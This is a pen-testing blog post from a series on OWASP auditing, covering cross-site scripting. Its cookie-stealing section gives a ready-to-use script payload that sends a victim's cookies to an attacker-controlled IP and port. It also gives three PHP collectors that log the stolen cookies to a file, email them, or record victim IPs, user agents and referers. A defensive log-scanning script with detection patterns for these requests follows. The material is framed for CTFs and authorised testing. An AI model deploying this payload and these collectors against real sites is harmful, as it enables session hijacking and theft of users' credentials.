[ Auditing With OWASP ] :: [ Vulnerability A7: Cross-Site Scripting XSS ]

This entry is part 4 of 4 in the series [ Auditing With the OWASP Top 10 ]

Vulnerability A7: Cross-Site Scripting XSS

XSS is oh, so useful for oh, so many things.

Here’s a summary:

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)

Practice and Process

Okay, start here:

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

You’ll see that the wiki is “retired”, and the new website (hopefully) holds all the old material too. We need:

XSS Filter Evasion Cheat Sheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Scan down the list of tests. It’s long, but really only goes about 1/3 of the way down the page. You could run these sample tests against a target in an afternoon, and if you’re doing serious pen testing, you will.

Once you are there, do a search in the page to highlight all occurrences of injection. Scroll down to the HTML and CSS injections. Open and read those sections.

While you’re at it, get used to the new interface. Check out this search, and notice how much stuff it will show for other testing areas:

https://owasp.org/search/?searchString=testing+for+xss

Here’s the description page:

https://owasp.org/www-community/attacks/xss/

Now scroll down to “How to Test for Cross-site scripting Vulnerabilities”. Look: they’ve done most of the research for you.

Cookie Stealing

This is a prime function of XSS. Here is its simplest form.

You’re going to need:

  1. A little JavaScript to paste into a form field, which links to your cookie stealer script.
  2. A little PHP (or pick any language) waiting on a web server for that JavaScript to call for it.
  3. A log file to store cookies.

If you’re using Kali or any Linux with netcat installed, you’ve already got a simple web server that you can load like a mousetrap. Just open a terminal and cd to a directory where you can put your stealer script, and fire up a server:

python -m SimpleHTTPServer 5555

You can change the port from 5555 to anything you like (on Python 3 the equivalent command is python3 -m http.server 5555). If you’re behind a router, you’ll need to forward this port to your testing box (Kali). Maybe don’t do this at home.

JavaScript for Cookie Stealing

You’re going to have to test the injectability of the form you’re going to (ab)use, which is a topic for another article. But in its simplest form, something like this will work:

<script>location.href = 'http://www.<your_IP>:5555/gimmecookies.php?cookie='+document.cookie;</script>

Obviously, you’ll need to fill in your IP address, and if you use a port other than 5555, change that here as well.

PHP for Cookie Stealing

Here are three simple ways to do it.

1. Create a file, paste in this code, and save it with the name gimmecookies.php in the directory where you started your web server.

<?php
// $HTTP_GET_VARS (used in the original) was removed in PHP 5.4; $_GET is the current superglobal.
$cookie = $_GET["cookie"] ?? '';
// Append the received value to the log file, one entry per line.
$log = fopen("gotcookies.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

This is the simplest way to go, and is useful in some CTFs.

2. Email the cookie to yourself. This is going to require a victim with working email capabilities (not every site has them).

<?php
// Same receiver, but hand the value to the local mail transport instead of a file.
$cookie = $_GET["cookie"] ?? '';
mail("<your_email>@<your_provider>.com", "Got Cookies", $cookie);
?>

3. Get the full information. This is highly useful if you’re going after more than just one cookie (as you often are in CTF situations).

<?php
// Best-effort client address: proxy-supplied headers first, then the socket address.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return $ip;
}

function logData()
{
    $ipLog = "gotcookies.txt";
    // The whole query string, so every parameter passed in is captured, not just cookie=.
    $cookie = $_SERVER['QUERY_STRING'] ?? '';
    // register_globals was removed in PHP 5.4, so this is false on any current PHP.
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();
    // Headers that are not always present fall back to an empty string.
    $rem_port    = $_SERVER['REMOTE_PORT'] ?? '';
    $user_agent  = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $rqst_method = $_SERVER['REQUEST_METHOD'] ?? '';
    $rem_host    = $_SERVER['REMOTE_HOST'] ?? '';
    $referer     = $_SERVER['HTTP_REFERER'] ?? '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");
    // If the log file is itself .htm/.html, write HTML line breaks instead of newlines.
    if (preg_match('/\bhtm\b/i', $ipLog) || preg_match('/\bhtml\b/i', $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}
logData();
?>
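For the defending side of the same technique, here is an added example (not part of the original post) that scans constructed access-log lines for both halves of this attack: the reflected `<script>` payload arriving at the vulnerable form, and the follow-up request that carries a cookie string in its query. The log lines, IP addresses and the gimmecookies.php path are constructed for the example.

```python
"""Flag XSS probes and cookie-exfiltration requests in web-server access logs."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines (combined log format, documentation IPs); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /search?q=owasp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2020:13:55:40 +0000] "GET /search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F198.51.100.9%3A5555%2Fgimmecookies.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 770 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2020:13:56:02 +0000] "GET /gimmecookies.php?cookie=PHPSESSID%3Dabc123%3B+role%3Dadmin HTTP/1.1" 404 209 "http://victim.example/profile" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Markers of a script-injection probe, checked on the URL-decoded query string.
XSS_MARKERS = re.compile(r'<\s*script|document\.cookie|javascript:|\bon\w+\s*=', re.I)
# A parameter value that looks like a cookie header, e.g. "PHPSESSID=...; role=...".
COOKIE_LIKE = re.compile(r'(?:^|;\s*)(?:PHPSESSID|JSESSIONID|session|sid)\w*=', re.I)


def classify(line):
    """Return 'xss-probe', 'cookie-exfil' or None for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if XSS_MARKERS.search(unquote_plus(parts.query)):
        return 'xss-probe'
    # parse_qsl decodes each value after splitting, so an encoded ';' stays inside one value.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if COOKIE_LIKE.search(value):
            return 'cookie-exfil'
    return None


def scan(log_text):
    """Return (client_ip, category, request_path) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        category = classify(line)
        if category:
            m = LOG_RE.match(line)
            hits.append((m.group('ip'), category, urlsplit(m.group('target')).path))
    return hits


if __name__ == '__main__':
    for ip, category, path in scan(SAMPLE_LOG):
        print(f"{category:12} {ip:15} {path}")
```

The second category only fires on your own server's logs if the exfiltration endpoint is hosted there; on the target application's logs the first category is the one to alert on.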

OWASP’s Discussion of Session Hijacking:

https://owasp.org/www-community/attacks/Session_hijacking_attack